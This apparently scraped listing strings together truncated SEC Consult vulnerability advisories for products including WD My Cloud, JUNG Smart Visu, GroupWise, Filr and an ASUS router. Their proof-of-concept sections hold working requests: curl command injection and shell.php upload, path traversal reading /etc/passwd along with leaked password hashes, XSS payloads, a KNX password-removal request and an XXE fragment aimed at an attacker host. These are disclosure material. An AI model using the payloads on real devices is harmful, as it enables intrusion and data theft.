AG-PRO-INS (Version: AirGWP v1.1.7) Ubiquiti Networks airGateway (Version: AirGW v1.1.7) Ubiquiti Networks airGateway-LR (Version: AirGW v1.1.7) Ubiquiti Networks AMG-PRO (Version: AirGWP v1.1.7) Ubiquiti Networks LBE-5AC-16-120 (Version: WA v7.2.4) Ubiquiti Networks LBE-5AC-23 (Version: WA v7.2.4) Ubiquiti Networks LBE-M5-23 (Version: XW v5.6.9/v6.0) Ubiquiti Networks NBE-5AC-16 (Version: WA v7.2.4) Ubiquiti Networks NBE-5AC-19 (Version: XC v7.2.4) Ubiquiti Networks NBE-M2-13 (Version: XW v5.6
SEC Consult SA-20170308-0 :: Multiple vulnerabilities in Navetti PricePoint
SEC Consult Vulnerability Lab Security Advisory < 20170308-0 > === title: Multiple vulnerabilities product: Navetti PricePoint vulnerable version: 4.6.0.0 fixed version: 4.7.0.0 or higher CVE number: - impact: high/critical homepage: http://www.navetti.com/ found: 2016-07-18 by: W. Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Navetti PricePoint is the ultimate business tool for controlling, managing and measuring all aspects of your pricing. Our clients have been able to increase their revenue and profitability substantially, implement market- and value-based pricing, increase customer trust and implement a common business language throughout their organization. In addition, with Navetti PricePoint our clients are able to implement governance processes, manage risk and ensure organization compliance, and attain business sustainability." Source: http://www.navetti.com/our-expertise/navetti-pricepoint/ Business recommendation: During a quick security check, SEC Consult identified four vulnerabilities, which are partially critical. As the time frame of the test was limited, it is suspected that there are more vulnerabilities in the application. It is highly recommended by SEC Consult to apply the patch resolving the identified vulnerabilities before using Navetti PricePoint in an environment with potential attackers. Vulnerability overview/description: --- 1) SQL Injection (Blind boolean based) Navetti PricePoint is prone to SQL injection attacks. The attacks can be executed by all privilege levels, ranging from the lowest privileged users to the highest privileged users. By exploiting this vulnerability, an attacker gains access to all records stored in the database with the privileges of the database user. 2) Multiple persistent cross site scripting vulnerabilities The web application suffers from multiple persistent cross site scripting issues. Low privileged users as well as high privileged users, are able to inject malicious JavaScript payloads persistently in the application. This vulnerability is even more critical, because it can be used by a low privileged user who wants to elevate his privileges. The low privileged attacker can place a payload which creates a new superuser, or add his own account to the superuser group. If a superuser logs in to the application, the JavaScript payload is executed with the rights of the superuser and the new user is created or added to the superuser group. 3) Multiple reflected cross site scripting vulnerabilities Navetti PricePoint suffers from multiple reflected cross site scripting issues. The code which is used to generate error messages inside of the application, does not correctly escape/sanitize user input. Due to that all error messages containing user input are prone to reflected cross site scripting attacks. Furthermore the file upload dialog does not correctly sanitize the file name of uploaded files. If a file name contains a JavaScript payload, it is executed in the file upload dialog. 4) Cross Site Request Forgery Navetti PricePoint doesn't implement any kind of cross site request forgery protection. Attackers are able to execute arbitrary requests with the privileges of any user. The only requirement is, that the victim clicks on a malicious link. For example an administrator can be forced to execute unwanted actions. Some of these actions are: -) Add users -) Delete users -) Add users to an arbitrary role -) Change internal settings of the application Proof of concept: - 1) SQL Injection (Blind boolean based) The search function in the tree structure, which displays various groups, does not properly validate user input, allowing an attacker with any privilege level to inject arbitrary SQL commands and read the contents of the whole database. The following URL could be used to perform blind SQL injection attacks: -) URL: /NBN.Host/PMWorkspace/PMWorkspace/FamilieTreeSearch (Parameter: searchString, Type: GET) 2) Multiple persistent cross site scripting vulnerabilities The following URL parameters have been identified to be vulnerable against persistent cross site scripting: -) URL: /NBN.Host/Component/Competitors/AddEdit (Parameter: name,POST) -) URL: /NBN.Host/Component/ItemSearchGrid/EditData (Parameter: Quality105,POST) -) URL: /NBN.Host/component/GroupInfo/SaveGroup (Para
SEC Consult SA-20170307-0 :: Unauthenticated OS command injection & arbitrary file upload in Western Digital WD My Cloud
SEC Consult Vulnerability Lab Security Advisory < 20170307-0 > === title: Unauthenticated OS command injection & arbitrary file upload product: Western Digital My Cloud vulnerable version: at least: 2.21.126 (My Cloud), 2.11.157(My Cloud EX2), 2.21.126 (My Cloud EX2 Ultra), 2.11.157 (My Cloud EX4), 2.21.126 (My Cloud EX2100), 2.21.126 (My Cloud EX4100), 2.11.157 (My Cloud Mirror), 2.21.126 (My Cloud Mirror Gen2), 2.21.126 (My Cloud PR2100), 2.21.126 (My Cloud PR4100), 2.21.126 (My Cloud DL2100), 2.21.126 (My Cloud DL4100) fixed version: - CVE number: - impact: Critical homepage: https://www.wdc.com/en-um/ found: 2017-01-17 by: Wan Ikram (Office Kuala Lumpur) Fikri Fadzil (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Reliable, centralized personal storage with automatic backup that plugs into your own home network. Share whatever you want, anywhere you have an Internet connection." Source: https://www.wdc.com/products/personal-cloud-storage/my-cloud.html Business recommendation: By combining the vulnerabilities documented in this advisory an attacker can fully compromise a WD My Cloud device. In the worst case one could steal sensitive data stored on the device or use it as a jump host for further internal attacks. SEC Consult recommends not to attach WD My Cloud to the network until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- The firmware doesn't apply proper validation on many user inputs. As a result, below vulnerabilities could be exploited by unauthenticated attackers to fully compromise the device. 1. Unauthenticated OS Command Injection Any OS commands can be injected by unauthenticated attackers. This is a serious vulnerability as the chances for the device to be fully compromise is very high. 2. Unauthenticated Arbitrary File Upload A malicious file can be uploaded into the webserver with no authentication required. It is possible for an attacker to upload a script to issue operating system commands. 3. Cross Site Request Forgery (CSRF) There is no anti-CSRF mechanism implemented in the firmware. Due to this, an attacker can force a user to execute any action through any script. As the vulnerabilities described in 1) and 2) do not need authentication, those can be exploited via CSRF over the Internet as well! Proof of concept: - 1. Unauthenticated OS Command Injection Below is a sample cURL request to execute arbitrary OS command for one of vulnerable scripts. $ curl http://$IP/web/addons/jqueryFileTree.php?host=x=x=x=x=x\"\; \; echo \"x 2. Unauthenticated Arbitrary File Upload Below is the cURL request to upload arbitrary files on the webserver. $ curl -F "file=@shell.php" http://$IP/web/addons/upload.php?name=x== 3. Cross Site Request Forgery (CSRF) There is no anti-CSRF mechanism implemented for all accessible scripts in the firmware. Vulnerable / tested versions: - The following device & firmware has been tested and found to be vulnerable: 2.11.157 (My Cloud EX2) As the firmware used by all My Cloud devices are more or less similar, we believe the other versions are also prone to the same vulnerabilities. This could be verified by using the IoT Inspector software for automated firmware analysis. Vendor contact timeline: 2017-01-18: Contacting vendor through "WD Support - Create a Support Case" page (https://support.wdc.com/support/case.aspx?lang=en). Assigned ticket number - 011817-11728265. 2017-01-19: Vendor: replies to the ticket asking for more clarification. 2017-01-20: Replied to the vendor, requesting security contact and encryption keys 2017-01-23: Vendor: "we don't have a security department that we could forward this concern" 2017-01-23: Telling support that there seems to be a security contact by referencing other WD advisories, requesting security contact again 2017-01-24: Vendor: asking for affected product name and firmware version. 2017-01-24: Providing list of affected product name and firmware versions,
SEC Consult SA-20170207 :: Path Traversal, Backdoor accounts & KNX group address password bypass in JUNG Smart Visu server
SEC Consult Vulnerability Lab Security Advisory < 20170207-0 > === title: Path Traversal, Backdoor accounts & KNX group address password bypass product: JUNG Smart Visu Server vulnerable version: Firmware v1.0.804/1.0.830/1.0.832 fixed version: Firmware v1.0.900 CVE number: - impact: Critical homepage: http://www.jung.de/ found: 2016-11-10 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "JUNG provides equipment and systems that win over by advanced technology, sophisticated design, and a large variety of features. On the one hand, our portfolio includes switches, socket outlets, dimmer, and observers. On the other, it includes innovative systems for controlling features in your home. From lighting, blind, or temperature control to wireless and KNX technologies, door communication, and multimedia control, a large range of applications is covered. In addition to comfort and security, also the requirements regarding cost-effectiveness and energy efficiency are met." Source:http://www.jung.de/en/1828/company/company-portrait/ Business recommendation: Attackers are able to gain root access through SSH with the credentials of the backdoor user account. A attacker can also unlock the group address protection for the KNX device mapping. JUNG has provided updated firmware which should be installed immediately. SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Path Traversal Vulnerability The Smart Visu Server runs with root privileges and is vulnerable to path traversal. This leads to full information disclosure of all files on the system. 2) Backdoor Accounts Two undocumented operating system user accounts are present on the appliance. They can be used to gain access to the Smart Visu Server via SSH. 3) Group Address (GA) unlock without Password As protection functionality, the KNX group address can be locked with a user-defined password. This password can be removed by using a single PUT request. An attacker can completely change the configuration of the connected devices (e.g. a light switch in the kitchen can be swapped with the air conditioner). Proof of concept: - 1) Path Traversal Vulnerability The Smart Visu Server is vulnerable to path traversal by sending the following GET-Request: Request GET /SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1 Host: [...] --- Response HTTP/1.1 200 OK Content-Disposition: inline;filename="passwd" [...] root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh [...] - 2) Backdoor Accounts Two undocumented operating system user accounts are present on the appliance. They can be used to gain access to Smart Visu Server over SSH on Port 5. Excerpt of the shadow file: root:$6$Zcv.yVRg$0OfnoSEEWdP4K/2z5Mm/56nfGbdAPl4ZSm3oDWqn3fMD9cXfZCov7O/siheuYggHxuqHvZQ7nPSBM5BcbrH9n.:16840:0:9:7::: daemon:*:15914:0:9:7::: [...] avahi:*:16541:0:9:7::: jung:$6$1SblJl3F$q6h6vfSC.IataQSqDNGw0wGvV8m/x8uLozBIj4Yj.ZzMoHbaMvzb2tR.B45I/ajsWpwkTcCNGjSZsLdC9IuzD.:16714:0:9:7::: 3) Group Address (GA) unlock without Password The following PUT request sends a JSON object to the server, which removes the password: Request PUT /rest/items/knxcom_datastore HTTP/1.1 Host: [...] {"groupNames":[],"name":"knxcom_datastore","label":"knxcom_datastore","type":"GroupItem","tags":["{\"lock_ga\":false}"]} - Vulnerable / tested versions: - Firmware version 1.0.804, 1.0.830 and 1.0.832 have been tested and found to be vulnerable. Vendor contact timeline: 2016-11-21: Contacting vendor through kundencen...@jung.de, ma
SEC Consult SA-20161128-0 :: DoS & heap-based buffer overflow in Guidance Software EnCase Forensic
SEC Consult Vulnerability Lab Security Advisory < 20161128-0 > === title: Denial of service & heap-based buffer overflow product: Guidance Software EnCase Forensic Imager & EnCase Forensic vulnerable version: EnCase Forensic Imager<= 7.10 EnCase Forensic (tested with version 7.08.00.137) fixed version: - CVE number: - impact: high homepage: https://www.guidancesoftware.com/encase-forensic-imager found: 2016-09-30 by: Wolfgang Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "When time is short and you need to acquire entire volumes or selected individual folders, EnCase Forensic Imager is your tool of choice. Based on trusted, industry-standard EnCase Forensic technology, EnCase Forensic Imager: * Is free to download and use * Requires no installation * Is a standalone product that does not require an EnCase Forensic license * Enables acquisition of local drives (network drives are not able to be acquired with Imager) * Provides easy viewing and browsing of potential evidence files, including folder structures and file metadata * Can be deployed via USB stick and used to perform acquisition of a live device" URL: https://www.guidancesoftware.com/encase-forensic-imager Business recommendation: SEC Consult recommends not to use Encase Forensic Imager or the Encase Forensic Suite until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Denial of Service Several manipulated hard disk images cause Encase Forensic Imager to crash. A suspect manipulating the hard drive could potentially hinder an investigator from using Encase Forensic Imager for creating hard disk images. Encase Forensic (v7) has been tested and found to be affected as well. 2) Heap-based buffer overflow Using a manipulated ReiserFS image an attacker can overwrite heap memory on the investigator's machine. Because of several restrictions SEC Consult was unable to create an exploit that works reliably within a reasonable timeframe. However, as with most heap-based buffer overflow vulnerabilities it is possible that an attacker could gain arbitrary code execution nevertheless. Proof of concept: - SEC Consult has created proof of concept disk images that will crash Encase. Those PoC images will not be released. 1) Denial of Service The following list demonstrates cases that cause Encase to crash. The investigators would be unable to analyze the hard disk/partition/image using the affected products: * Ext3: - Several conditions cause Encase Forensic Imager to encounter an div/0 exception. Disk images that were manipulated in the following way demonstrate this issue. Those crashes have not been further investigated as to whether code execution is possible. + nummer of blocks per group: 0x + total numer of blocks: 0x + last mount path: 'A'*10 + volume name: 'A'*10 + block number of the superblock: 0 + FS-Id: 'A'*10 - Manipulating the size of the inode structure value (e.g. 0x) causes Encase Forensic Imager to write beyond the limits of a previously allocated (VirtualAlloc) segment. * Iso9660: - If the length of a file name is specified in a way that it would exceed the end of the last block, Encase Forensic Imager crashes while trying to read beyond an allocated segment. * ReiserFs: - When setting a block size of below 0x200 the application overwrites heap memory with attacker-supplied data. * GPT: - When specifying an overly long name (in our setup longer than 0x3fc6) for a partition, Encase Forensic crashes failing to read memory when trying to determine the length of the string. The partition table can be constructed in a way that it can also be used for storing data. However, an investigator using Encase will not be able to analyze it. 2) Heap-based buffer overflow The manipulated ReiserFs image that causes the application to overwrite heap memory can be tuned to overwrite heap-data with attacker-controlled data. The application calculates a value (here called "dev_block_count") as: dev_block_count = blocksize from image (e.g. 0x200) / blocksize of reading device (typically 0x200) * number of blocks .text:0
SEC Consult SA-20161114-0 :: Multiple vulnerabilities in I-Panda SolarEagle - Solar Controller Administration Software / MPPT Solar Controller SMART2
SEC Consult Vulnerability Lab Security Advisory < 20161114-0 > === title: Multiple vulnerabilities product: I-Panda SolarEagle - Solar Controller Administration Software / MPPT Solar Controller SMART2 vulnerable version: SolarEagle V2.00 / MPPT Solar Controller SMART2 fixed version: - CVE number: - impact: Medium homepage: http://www.solarcontroller-inverter.com/ found: 2016-09-03 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "ShenZhen I-Panda Electronics Co. Ltd. is developing power supply devices such as UPS, power adapter and power inverter and also equipment for solar systems. This equipment produced by I-Panda comprises solar panels/ controllers/inverters and also solar generator systems." Source: http://www.solarcontroller-inverter.com/about-us.html Business recommendation: SEC Consult recommends not to use this product until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Broken Local Admin Authentication in SolarEagle V2.00 Attackers which have access to the locally installed software are able to bypass the administrative login and can control the MPPT Solar Controller. 2) Missing Server Side Authentication in MPPT Solar Controller SMART2 Attackers which have access to the local network can send their own commands to the MPPT Solar Controller and are able to control the device this way. 3) Unencrypted Communication in MPPT Solar Controller SMART2 Eavesdropping the communication is possible since unencrypted TCP is used for all packets which are transferred between the controller and SolarEagle. 4) Denial of Service in MPPT Solar Controller SMART2 Attackers are able to disrupt an active connection as long as they want. Proof of concept: - The vendor was not responsive, hence there is no fix available. The proof of concept has been removed from this advisory. Vulnerable / tested versions: - SolarEagle V2.00 / MPPT Solar Controller SMART2 Vendor contact timeline: 2016-09-12: Contacting vendor through email, sending responsible disclosure policy, defining release deadline (10th November), asking for encryption keys 2016-09-13: Contacting vendor through email, sending responsible disclosure policy, defining release deadline (10th November), asking for encryption keys 2016-09-13: Vendor: (Instant-Messenger) No encryption available. Offer to send the advisory unencrypted; No Answer 2016-10-29: Offer to send the advisory unencrypted; No Answer 2016-11-03: Offer to send the advisory unencrypted; No Answer 2016-11-14: SEC Consult releases security advisory Solution: - There is no fix available from the vendor as they did not respond. Workaround: --- No workaround Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF
SEC Consult SA-20161011-0 :: XXE vulnerability in RSA Enterprise Compromise Assessment Tool (ECAT)
SEC Consult Vulnerability Lab Security Advisory < 20161011-0 > === title: XML External Entity Injection (XXE) product: RSA Enterprise Compromise Assessment Tool (ECAT) vulnerable version: 4.1.0.1 fixed version: 4.1.2.0 CVE Number: - impact: Medium homepage: https://www.rsa.com found: 2016-04-27 by: Samandeep Singh (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime." Source: https://www.rsa.com/en-us/company/about Business recommendation: By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using RSA ECAT client and thus obtain sensitive information from the system. It is also possible to scan ports of the internal hosts and cause DoS on the affected host. SEC Consult recommends not to use the product until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) XML External Entity Injection The used XML parser is resolving external XML entities which allows attackers to read files and send requests to systems on the internal network (e.g port scanning). The vulnerability can be exploited by tricking the user of the application to import a whitelisting file with malicious XML code. Proof of concept: - 1) XML External Entity Injection (XXE) The RSA ECAT client allows users to import whitelisting files in XML format. By tricking the user to import an XML file with malicious XML code to the application, it's possible to exploit an XXE vulnerability within the application. For example by importing the following XML code, arbitrary files can be read from the client's system. The following code generates the connection request from the client system to attacker system. === http://[IP:port]/; >]> === IP:port = IP address and port where the attacker is listening for connections Furthermore some files can be exfiltrated to remote servers via the techniques described in: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf Vulnerable / tested versions: - The XXE vulnerability has been verified to exist in the RSA ECAT software version 4.1.0.1 which was the latest version available at the time of discovery. Vendor contact timeline: 2016-04-28: Vulnerabilities reported to the vendor by 3rd party 2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972) 2016-10-11: SEC Consult releases security advisory Solution: - Update to version 4.1.2.0 Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.co
SEC Consult SA-20160825-0 :: Multiple vulnerabilities in Micro Focus (Novell) GroupWise
SEC Consult Vulnerability Lab Security Advisory < 20160825-0 > === title: Multiple vulnerabilities product: Micro Focus GroupWise vulnerable version: GroupWise 2014 R2 (<=SP1) GroupWise 2014 (unsupported versions may be affected) fixed version: GroupWise 2014 R2 Service Pack 1 Hot Patch 1 CVE number: CVE-2016-5760, CVE-2016-5761, CVE-2016-5762 impact: critical homepage: https://www.novell.com/products/groupwise/ found: 2016-07 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Micro Focus GroupWise is a complete collaboration software solution that provides email, calendaring, instant messaging, task management, contact and document management functions. GroupWise has long been praised by customers and industry watchers for its security and reliability." URL: https://www.novell.com/products/groupwise/ Business recommendation: During a quick security check SEC Consult found three vulnerabilities in the Micro Focus GroupWise server applications. As these partly critical vulnerabilities were identified during a short time frame SEC Consult recommends to conduct a thorough technical security audit. Vulnerability overview/description: --- 1) Reflected cross site scripting in the administrator console (CVE-2016-5760) Two reflected cross site scripting vulnerabilities have been identified in the gwadmin-console application. An attacker could potentially take over an administrator's session. 2) Persistent cross site scripting via emails (CVE-2016-5761) By sending a single email to a victim an attacker could take over the victim's email account. For a successful exploitation the victim has to click on a link in an email opened in GroupWise WebAccess. 3) Heap-based Buffer Overflow / Integer Overflow (CVE-2016-5762) By sending a crafted value for the username or the password to GroupWise WebAccess or the GroupWise Post Office Agent during login an attacker can overwrite heap memory. In order to exploit this vulnerability no user authentication is required. PLEASE NOTE: A successful exploitation of this vulnerability may allow an attacker to execute code remotely. As SEC Consult only conducted a very quick security check this has not been verified. Proof of concept: - 1) Reflected cross site scripting in the administrator console The following links demonstrate reflected cross site scripting vulnerabilities: https://testhost:9710/gwadmin-console/install/login.jsp?token=asdf%22%2balert%28%27xss%27%29%2b%22 https://testhost:9710/gwadmin-console/index.jsp#poa:%3Cimg%20src=x%20onerror=alert%28%27xss%27%29%3E 2) Persistent cross site scripting via emails The following Python fragment demonstrates the generation of a hyperlink that, when embeded into an HTML email, would, upon clicking it, open a new mail dialog. snip msg = """ click me """.replace('$charcode', ','.join(str(ord(x)) for x in list('idNewPopupMenu'))) snip 3) Heap-based Buffer Overflow / Integer Overflow When a username or password longer than 65332 (2^16 - 3) is specified, an overflow causes the Post Office Agent to allocate too little memory. The following pseudocode shows how the memory to be allocated is calculated based on the input length. ((uint16_t) (() + 3) & 0xFFFC) + 1) Therefore, a value of 65533 would cause the application to allocate 1 byte. By modifying this value accordingly, an attacker can cause the application to allocate an arbitrary amount of memory. The user-specified value is then copied into this buffer until a NUL-byte is reached. This allows an attacker to write non-NUL bytes after the allocated heap chunk. Vulnerable / tested versions: - The version 2014 R2 SP1 of Micro Focus GroupWise was found to be vulnerable. This version was the latest version at the time of the discovery. Vendor contact timeline: 2016-07-05: Contacting vendor through secur...@novell.com 2016-07-06: Micro Focus was able to reproduce the vulnerabilities 2016-07-25: Micro Focus: The issues have been resolved in development 2016-08-12: Micro Focus: Hotpatch is currently undergoing QA 2016-08-25: Coordinated release of security advisory Solution: - The "GroupWise 2014 R2 Service Pack 1 Hot Patch 1" should be applied immediately. This upda
SEC Consult SA-20160725-0 :: Multiple vulnerabilities in Micro Focus (Novell) Filr
SEC Consult Vulnerability Lab Security Advisory < 20160725-0 > === title: Multiple vulnerabilities product: Micro Focus (former Novell) Filr Appliance vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846 fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871 CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609 CVE-2016-1610, CVE-2016-1611 impact: critical homepage: https://www.novell.com/products/filr/ found: 2016-05-23 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Unlike other mobile file access and collaborative file sharing solutions, Micro Focus Filr has been designed with the enterprise in mind, resulting in less administration, better security and more productive users." URL: https://www.novell.com/products/filr/ Business recommendation: During a very quick security check several vulnerabilities with high impact have been discovered. SEC Consult recommends to immediately apply the patches provided by Micro Focus to address these issues. Please note that since SEC Consult did not conduct a thorough technical security check SEC Consult cannot make a statement regarding the overall security of the Micro Focus Filr appliance. Vulnerability overview/description: --- During a quick security check several vulnerabilities have been identified that ultimately allow an attacker to completely compromise the appliance: 1) Cross Site Request Forgery (CSRF) - CVE-2016-1607 Several functions within the appliance's administative interface lack protection against CSRF attacks. This allows an attacker who targets an authenticated administrator to reconfigure the appliance. 2) OS Command Injection - CVE-2016-1608 The appliance administrative interface allows an authenticated attacker to execute arbitrary operating system commands. Please note that an attacker can combine this vulnerability with vulnerability #1. In this scenario, an attacker does not need to be authenticated. 3) Insecure System Design The appliance uses a Jetty application server to provide the appliance administration interface. This application server is started as the superuser "root". Please note that combined with vulnerability #1 and #2 an attacker can run commands as the superuser "root" without the need for any authentication. For vendor remark on #3 see solution section. 4) Persistent Cross-Site Scripting - CVE-2016-1609 The Filr web interface uses a blacklist filter to try to strip any JavaScript code from user input. However, this filter can be bypassed to persistently inject JavaScript code into the Filr web interface. 5) Missing Cookie Flags The httpOnly cookie flag is not set for any session cookies set by both the administrative appliance web interface and the Filr web interface. Please note that combined with vulnerability #4 an attacker can steal session cookies of both the appliance administration interface and the Filr web interface (since cookies are shared across ports). For vendor remark on #5 see solution section. 6) Authentication Bypass - CVE-2016-1610 An unauthenticated attacker is able to upload email templates. 7) Path Traversal - CVE-2016-1610 The functionality that allows an administrator to upload email templates fails to restrict the directory the templates are uploaded to. Please note that combined with vulnerability #6 an attacker is able to upload arbitray files with the permissions of the system user "wwwrun". 8) Insecure File Permissions - CVE-2016-1611 A file that is run upon system user login is world-writeable. This allows a local attacker with restricted privileges to inject commands that are being executed as privileged users as soon as they log into the system. Please note that combined with vulnerabilities #6 and #7 an unauthenticated attacker can inject commands that are executed as privileged system users (e.g. root) using the Filr web interface. Proof of concept: - 1, 2, 3) The following HTML fragment demonstrates that using a CSRF attack (#1) system commands can be injected (#2) that are executed as the user root (#3): - snip - - snip - 4) The following string demonstrates how the XSS filter can be circumvented: This string can e.g. be used by a restricted user in the "phone" field of the user prof
SEC Consult SA-20160624-0 :: ASUS DSL-N55U router XSS and information disclosure
SEC Consult Vulnerability Lab Security Advisory < 20160624-0 > === title: XSS and information disclosure vulnerability product: ASUS DSL-N55U router vulnerable version: 3.0.0.4.376_2736 fixed version: 3.0.0.4_380_3679 CVE number: requested impact: Medium homepage: https://www.asus.com/ found: 2016-04-12 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "ASUS has long been at the forefront of this growth and while the company started life as a humble motherboard manufacturer with just a handful of employees, it is now the leading technology company in Taiwan with over 12,500 employees worldwide. ASUS makes products in almost every area of Information Technology too, including PC components, peripherals, notebooks, tablets, servers and smartphones." Source: https://www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS Business recommendation: SEC Consult recommends not to use this device until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1. Reflected Cross-Site Scripting The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware. If the web path is longer than 50 characters, it will redirect a user to the cloud_sync.asp page with the web path as a value of a GET parameter. Due to the lack of input validation, an attacker can insert malicious JavaScript code to be executed under a victim's browser context. No authentication is required. 2. Remote DHCP Information Disclosure An unauthenticated attacker can gain access to DHCP information including the hostname and private IP addresses of the local machines connected to the router from the WAN IP address. Proof of concept: - 1. Reflected Cross-Site Scripting HTTP Request: GET /111'+alert('XSS')+' HTTP/1.1 Host: HTTP Response: HTTP/1.0 200 OK Server: httpd Date: Tue, 12 Apr 2016 09:04:48 GMT Content-Type: text/html Connection: close location.href='/cloud_sync.asp?flag=111'+alert('XSS')+''; 2. Remote DHCP Information Disclosure HTTP Request: GET /Nologin.asp HTTP/1.1 Host: HTTP Response: HTTP/1.0 200 Ok Server: httpd [...] var dhcpLeaseInfo = [['', ''],['', ''],['', '']];; function initial(){ [...] Vulnerable / tested versions: - The following firmware has been tested which was the most recent version at the time of discovery: - 3.0.0.4.376_2736 (2015/01/19 update) URL: https://www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/ Vendor contact timeline: 2016-06-02: Contacting vendor through priv...@asus.com and netad...@asus.com.tw. 2016-06-03: ASUS responds and establishes encrypted communication channel. 2016-06-06: Sending PGP encrypted security advisory to ASUS. 2016-06-20: Vulnerability is fixed in beta firmware. 2016-06-24: Public release of the advisory. Solution: - Upgrade to firmware version 3.0.0.4_380_3679 or later. Workaround: --- No workaround available. Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: r
